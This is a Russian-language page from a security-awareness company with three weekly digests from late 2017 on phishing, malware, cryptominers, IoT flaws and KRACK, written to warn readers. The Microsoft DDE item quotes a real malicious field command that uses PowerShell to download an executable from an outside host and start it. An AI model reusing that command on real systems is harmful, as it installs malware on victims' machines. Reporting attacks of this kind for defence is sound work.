Ctrl + ↑ Позднее

Представляем новости об актуальных технологиях фишинга и других атаках на человека c 27 октября по 2 ноября 2017 года.


Сергей Волдохин
sv@antiphish.ru


Андрей Жаркевич
редактор, ИТ-руководитель

Сайты, мессенджеры и электронная почта

Обнаружена новая целевая атака, большая часть жертв — российские банки, также заражение обнаружено в финансовых организациях Армении и Малайзии.

Вектор проникновения банковские сети — электронные письма с вредоносными вложениями:

  1. Во вложении к письму находится файл формата CHM (Microsoft Compiled HTML Help — проприетарный формат справочных файлов Microsoft). По сути, это набор HTML-страниц, упакованный в сжатом виде в один файл.
  2. Когда жертва открывала вредоносное вложение, автоматически исполнялся вложенный в CHM start.htm. Этот файл содержит вредоносный Javascript, в задачах которого была загрузка и запуск обфусцированного VBS-скрипта, который в свою очередь загружал файл-дроппер основной вредоносной программы:

Также атакующие используют инфраструктуру уже зараженных финансовых учреждений, рассылая новым жертвам вредоносные сообщения с реально существующих электронных адресов, что существенно повышает шансы на заражение.

Обнаружена фишинговая кампания, в которой злоумышленники крадут у пользователей логины и пароли от Facebook или YouTube:

  1. Пользователь получает сообщение в Facebook Messenger.
  2. Сообщение содержит превью, которое выглядит как ссылка на YouTube-видео с соответствующей картинкой и адресом youtube.com.
  3. При переходе по ссылке жертва попадает на фишинговую страницу, где ей предлагают ввести данные для входа в Facebook или YouTube.
  4. Если жертва вводит данные, злоумышленники получают контроль над учётной записью:

Атака строится на том, что информацию для составления превью бот Facebook берёт не с сайта по ссылке, а из метаданных OpenGraph og:url, og:image и og:title.

Проверка на соответствие og:url и оригинального домена не производится, поэтому ссылка и превью, которые выглядят как YouTube-ролик, могут вести на другой сайт:

Видео с демонстрацией атаки:

Вредоносное ПО

Шифровальщик ONI, атакующий японский бизнес, оказался прикрытием — вайпером, с помощью которого киберпреступники скрывают следы предшествующих проникновений:

  1. Первая атака начинается с фишинговых писем, содержащих запароленный архив с заражённым документом MS Office.
  2. Используя социальную инженерию, мошенники заставляют пользователя распаковать архив и открыть документ.
  3. При этом выполняется сценарий VBScript, который загружает Ammyy Admin — программу для удалённого управления, которая не является вредоносной, но часто используется киберпреступниками:

С помощью Ammyy Admin преступники внедряются в систему, выполняют вредоносные действия.

На завершающей стадии атаки мошенники запускают ONI, который шифрует файлы и требует выкуп. Но настоящая цель — скрыть следы основной атаки.


Требование выкупа ONI, который шифрует главную загрузочную запись.

Криптовалюты

Троян CryptoShuffler крадёт криптовалюту из кошельков пользователей очень эффективным способом. Он не загружает модули из интернета, ничего никуда не отправляет и совершенно не тормозит работу системы. Вместо этого он наблюдает за буфером обмена и обнаружив там номер криптокошелька, подменяет его на собственный. В результате перевод уходит злоумышленникам вместо настоящего адресата.

За время работы мошенники уже похитили 23 биткоина — около $150 000 по текущему курсу.

На официальном сайте D-Link обнаружен Javascript-майнер криптовалюты Monero:

На видео: при каждом открытии страницы загружался отдельный домен со скрытым элементом iframe, содержащем скрипт для майнинга в браузере пользователя.

После того, как исследователи уведомили D-Link об инциденте, компания полностью отключила web-сайт и начала перенаправлять пользователей на американскую версию ресурса (us.dlink.com).

Киберпреступники используют для майнинга не только браузеры на обычных компьютерах, но и Android-смартфоны: в составе трёх приложений для Android обнаружены майнинговые скрипты.



Приложения Recitiamo Santo Rosario Free и SafetyNet Wireless App были свободно доступны в официальном каталоге Google Play. Проверки безопасности Google не сумели выявить фоновый запуск майнера с помощью WebView.

Умные устройства

Уязвимость в приложении LG SmartThinQ, при помощи которого пользователи могут управлять различными устройствами, включая плиты, кондиционеры, посудомоечные и стиральные машины, позволяет скомпрометировать инфраструктуру «умных» домов, где используются решения LG.

Атакующий может скомпрометировать процесс аутентификации между SmartThinQ и бэкэндом LG и перехватить управление аккаунтом пользователя, а вместе с ним и контроль над всеми IoT-девайсы, привязанными к этому профилю. Получив контроль, можно спровоцировать перегрев духовки, изменить температуру в помещении или следить за жертвой через камеры, встроенные в «умные» устройства.

Демонстрация атаки:

О компании «Антифишинг»

Мы помогаем обучить сотрудников и контролировать их навыки с помощью учебных фишинговых атак. Используем реалистичные сценарии и самые актуальные примеры мошенничества.

Чтобы проверить своих сотрудников, заполните форму на сайте или напишите нам: ask@antiphish.ru

Оставайтесь в безопасности

Подпишитесь на рассылку, чтобы знать об актуальных технологиях фишинга и других атаках на человека.

Представляем новости об актуальных технологиях фишинга и других атаках на человека c 20 по 26 октября 2017 года.


Андрей Жаркевич
редактор, ИТ-руководитель

Сайты, мессенджеры и почта

Целью фишинговой атаки стали специалисты по безопасности, которых могли заинтересовать новости CyCon — американской конференции по информационной безопасности:

Злоумышленники сочли, что анонс мероприятия, ориентированного на специалистов по информационной безопасности, станет хорошей наживкой, скопировали документы с официального сайта CyCon и внедрили в них малварь Seduploader с вредоносными VBA-скриптами.

Seduploader может делать скриншоты зараженного устройства, собирать и передавать на управляющий сервер информацию о системе, а также загружать файлы и выполнять код.

Microsoft Outlook оказался подвержен атаке через протокол Dynamic Data Exchange. Чтобы атаковать пользователя, оказалось достаточно отправить ему письмо в формате RTF —
вредоносный код помещается непосредственно в теле письма.

Чтобы избежать заражения, достаточно нажать «Нет» в следующих диалоговых окнах:

или включить принудительный просмотр всех сообщений в формате «только текст».

Вредоносное ПО

Крупные российские СМИ, а также ряд украинских госучреждений подверглись атакам шифровальщика Bad Rabbit. В числе пострадавших оказались «Интерфакс», «Фонтанка», а также Международный аэропорт «Одесса», Киевский метрополитен и украинское Министерство инфраструктуры.

Основным вектором распространения стали взломанные сайты СМИ, на которых посетителям предлагали скачать и запустить фальшивое обновление Flash Player:

Как минимум в одном из случаев для компрометации легитимного сайта был взломан компьютер разработчика сайта.

После заражения вредонос задействовал утилиту Mimikatz для извлечения паролей из LSASS, а также имел список наиболее распространенных логинов и паролей, чтобы через SMB и WebDAV распространиться на другие серверы и рабочие станции, находящиеся в одной сети с зараженным устройством.

Пользователи популярного macOS-плеера Elmedia Player оказались под угрозой заражения вредоносом Proton в результате взлома сайта Eltima — разработчика приложения.

Proton позволяет злоумышленнику удалённо похищать данные с зараженного устройства, в том числе информацию об операционной системе, пароли в браузере, файлы cookie, историю просмотров, закрытые SSH-ключи, данные о криптовалютных кошельках, конфигурации VPN, данные GnuPG и пр. Кроме того, Proton может использоваться для загрузки дополнительного вредоносного ПО.

Криптовалюты

Злоумышленники взломали сервис CoinHive, который предоставляет владельцам сайтов возможноcть встроить скрипты для майнинга криптовалюты прямо в код ресурса. В результате криптовалюту зарабатывали не владельцы сайтов, а мошенники.

Для взлома использовались похищенные в 2014 году учётные данные CoinHive на сервисе Cloudflare, которые так и не удосужились поменять. Атака продолжалась около шести часов, но сколько за это время успели «заработать» злоумышленники, не сообщается.

Новая фишинговая кампания использует поддельные письма от администрации сервиса Myetherwallet.com для хищения криптовалюты из кошельков пользователей.

  1. В письмах говорится, что ресурс готовится к хардфорку, в связи с чем необходимо перейти по приведенной в письме ссылке, разблокировать аккаунт и проверить баланс.
  2. Ссылка из письма приводит жертву на сайт, идентичный настоящему Myetherwallet. Чтобы усилить сходство, преступники зарегистрировали домен с юникодным символом «ț» в адресе сайта — вместо настоящей буквы «t».
  3. Если жертва вводит свои учетные данные на фальшивом сайте, преступники немедленно подключаются к настоящему кошельку пострадавшего и выводят все деньги.

Злоумышленникам повезло: только на одном из кошельков хранилось 42,5 ETH — около $12 500. Общий заработок преступников составил 52,56 ETH ($15 875) за два часа.

Мобильная безопасность

Новый Android-троян LokiBot похищает деньги с банковских счетов пользователя, а при попытке отзыва привилегий администратора превращается в вымогательское ПО и шифрует смартфон:

По аналогии с другими мобильными банковскими троянами LokiBot отображает поддельные окна поверх окон легитимных приложений. В сфере интересов трояна как банковские приложения, так и Skype, Outlook или WhatsApp.

LokiBot содержит ряд необычных функций:

  1. Установка SOCKS5-прокси для перенаправления трафика.
  2. Автоматические ответы на SMS и SMS-рассылки по всему списку контактов жертвы. Эта функция используется для рассылки вредоносного спама и заражения других пользователей.
  3. Вывод фальшивых сообщений якобы от настоящих приложений. Таким образом вредонос может сообщить жертве о поступлении денег на счёт и подтолкнуть её запустить приложение банка.

Мобильные приложения для онлайн-знакомств позволяют не только перехватить и украсть личную информацию, но и раскрыть личность пользователя сервиса знакомств, что в перспективе может создать жертве массу проблем — от рассылки сообщений от ее имени в социальной сети до шантажа.

Например, в Tinder, Happn и Bumble пользователь может указать сведения о работе и образовании. Используя эту информацию, можно найти страницы пользователей в других социальных сетях, таких как Facebook и LinkedIn, их имена и фамилии:

О компании «Антифишинг»

Мы помогаем обучить сотрудников и контролировать их навыки с помощью учебных фишинговых атак. Используем реалистичные сценарии и самые актуальные примеры мошенничества.

Чтобы проверить своих сотрудников, заполните форму на сайте или напишите нам: ask@antiphish.ru

Оставайтесь в безопасности

Подпишитесь на рассылку, чтобы знать об актуальных технологиях фишинга и других атаках на человека.

Представляем новости об актуальных технологиях фишинга и других атаках на человека c 13 по 19 октября 2017 года.


Андрей Жаркевич
редактор, ИТ-руководитель

Сайты, мессенджеры и почта

Новая разновидность фишинговых атак с использованием документов MS Office использует для загрузки и запуска вредоносного кода технологию Microsoft DDE.

DDE позволяет вставить в документ поле, данные в которое загружаются из других приложений. При загрузке такого документа пользователь увидит предупреждение с предложением загрузить данные:

Если пользователь согласится обновить данные, будет сформирован и запущен на выполнение вредоносный код:

"DdE" c:\\Windows\\System32\\cmd.exe " /k powershell.exe (New-Object System.Net.
WebClient).DownloadFile('http://frontiertherapycenter[.]com/16.exe',
'%TEMP%\\tvs.exe');Start-Process '%TEMP%\\tvs.exe'"</w:instrText>

Основная проблема заключается в том, что пользователи, которые часто работают со связанными документами, не обращают внимания на эти сообщения. Предупреждения выглядят настолько привычными, что их подтверждают, не читая.

Злоумышленники используют функцию «Доверенные контакты», чтобы обманом получить код для смены пароля пользователя Facebook:

  1. Жертва получает письмо от друга, с которым редко общается.
  2. «Друг» сообщает, что назначил жертву доверенным контактом и просит прислать код для разблокировки учетной записи.
  3. На почту приходит некий код. На самом деле он предназначен для смены собственного пароля жертвы: чтобы прислать его, злоумышленники вводят логин жертвы и нажимают «Забыли пароль?».
  4. Получив от жертвы код, преступники взламывают аккаунт и рассылают аналогичные сообщения друзьям обманутого пользователя.

Преступники массово рассылают фишинговые уведомления в Viber от имени ВТБ 24 и Сбербанка. В уведомлении сообщается, что картой пользователя оплатили покупку и платеж будет проведен в течение суток. Если пользователь не совершал покупки, предлагается позвонить «в службу безопасности»:

Когда жертва звонит по указанному номеру, мошенники требуют предоставить данные платежной карты для «идентификации» клиента.

Умные устройства

Некоторые модели «умных» детских часов содержат уязвимости, с помощью которых злоумышленники могут отслеживать и подслушивать пользователей устройств или даже общаться с ними:

Часы Gator и GPS for Kids передают и сохраняют данные без какого-либо шифрования. Таким образом злоумышленники без особого труда могут отследить или изменить данные о местоположении ребенка.

Радиоключи некоторых моделей Subaru содержат уязвимость, которую можно использовать для угона автомобиля:

Уязвимость позволяет перехватить код, который передается при нажатии кнопки брелока, и использовать его в устройстве, дублирующем все возможности ключа.

Для перехвата кода достаточно компьютера Raspberry PiB+, USB-адаптера WiFi, ТВ-ресивера, антенны диапазона 433 МГц и переходника с MCX на MSA. Стоимость каждого из этих устройств варьируется от одного до 25 долларов, а купить их можно в любом магазине электроники.

Получив один-единственный сигнал с брелока при нажатии любой кнопки, преступник может использовать полученные данные, чтобы вычислить следующий код, а потом открыть машину, багажник или отключить сигнализацию.

Жёсткий диск компьютера можно использовать для организации скрытой прослушки помещения без использования микрофона.

Атака основана на предположении, что винчестер выполняет различные операции за различное время в зависимости от поданных входных данных, роль которых играют колебания считывающей головки и пластины HDD, коррелирующие с вибрациями среды, то есть со звуком.

Измеряя время вычислений и проводя статистический анализ данных, можно измерить колебания головки/пластины и, следовательно, вибрации среды. Чем больше задержка в считывании данных — тем сильнее колебания HDD и, значит, тем громче звук.

Демонстрация звукозаписи с помощью HDD, работа утилиты Kscope:

Криптовалюты

Криптомайнер WaterMiner распространяли вместе с модом для игры GTAV:

После запуска вредонос связывался через TCP-порт 45560 с майнинг-пулом, который объединяет вычислительные ресурсы зараженных компьютеров и использует их для майнинга криптовалюты Monero.

Общедоступный код WaterMiner был доработан: майнер автоматически отключался, как только пользователь открывал Диспетчер задач Windows или любое другое приложение, позволяющее понять, какой именно процесс тормозит работу.

Мобильная безопасность

Зловред DoubleLocker распространяется под видом обновления Adobe Flash Player и использует уязвимость Android Accessibility Service, чтобы изменить PIN-код на зараженном аппарате и зашифровать его содержимое.

Функция Accessibility Service позволяет приложениям эмулировать прикосновения по элементам управления, упрощая использование устройства людям со слабым зрением и прочими ограничениями.

  1. После запуска зловред от лица Google Play Service запрашивает у пользователя разрешение на управление.
  2. Если пользователь предоставляет DoubleLocker требуемые разрешения, вирус дает себе статус администратора и привязывается к кнопке «Домой».
  3. Каждое ее нажатие запускает шифровальщик, который раз за разом блокирует устройство.

Видео с демонстрацией работы DoubleLocker

За расшифровку злоумышленники требуют в течение суток заплатить 0,0130 BTC. Это около $72 по курсу на 16 октября. Вернуть контроль над устройством с потерей данных можно путём сброса.

В протоколе WPA2 обнаружены слабости, которые позволяют обойти защиту, прослушивать и подменять Wi-Fi-трафик, передаваемый между точкой доступа и клиентом. Комплекс уязвимостей получил название KRACK (аббревиатура от Key Reinstallation Attacks).

KRACK позволяет осуществить атаку типа man-in-the-middle и принудить участников сети выполнить реинсталляцию ключей шифрования, которые защищают трафик WPA2.

Метод KRACK универсален и работает против любых устройств, подключенных к Wi-Fi сети. В опасности все пользователи Android, Linux, iOS, macOS, Windows, OpenBSD, а также многочисленные IoT-устройства.

Видео с демонстрацией атаки:

Антифишинг рекомендует:

  1. Установить последние обновления на свои устройства.
  2. Обновить прошивки на своих точках доступа.
  3. Считать любые Wi-Fi сети незащищенными: не расчитывать на встроенное шифрование и не попадаться на возможные мошенничества в беспроводных сетях.

Вредоносное ПО

Вредоносное ПО Sockbot маскируется под скины для Minecraft Pocket Edition:

Приложения действительно меняют внешний вид персонажа игры, но в фоновом режиме подключаются к управляющему серверу, получают список рекламных объявлений и связанных с ними метаданных. Затем приложение подключается к рекламному серверу через SOCKS-прокси и отправляет рекламные запросы.

Новое вредоносное расширение Chrome загружает скрипт Coinhive для майнинга криптовалюты и использует Gmail-аккаунт жертвы для регистрации доменов:

  1. Расширение по имени Ldi продвигается на взломанных сайтах с помощью навязчивого показа предупреждений JavaScript с предложением установить Chrome-плагин.
  2. Если закрыть эти предупреждения, в браузере автоматически откроется страница загрузки Ldi на Chrome Web Store.
  3. После установки Ldi загружает майнер Monero:

и начинает процесс регистрации доменов на Freenome.com:

О компании «Антифишинг»

Мы помогаем обучить сотрудников и контролировать их навыки с помощью учебных фишинговых атак. Используем реалистичные сценарии и самые актуальные примеры мошенничества.

Чтобы проверить своих сотрудников, заполните форму на сайте или напишите нам: ask@antiphish.ru

Оставайтесь в безопасности

Подпишитесь на рассылку, чтобы знать об актуальных технологиях фишинга и других атаках на человека.

Ctrl + ↓ Ранее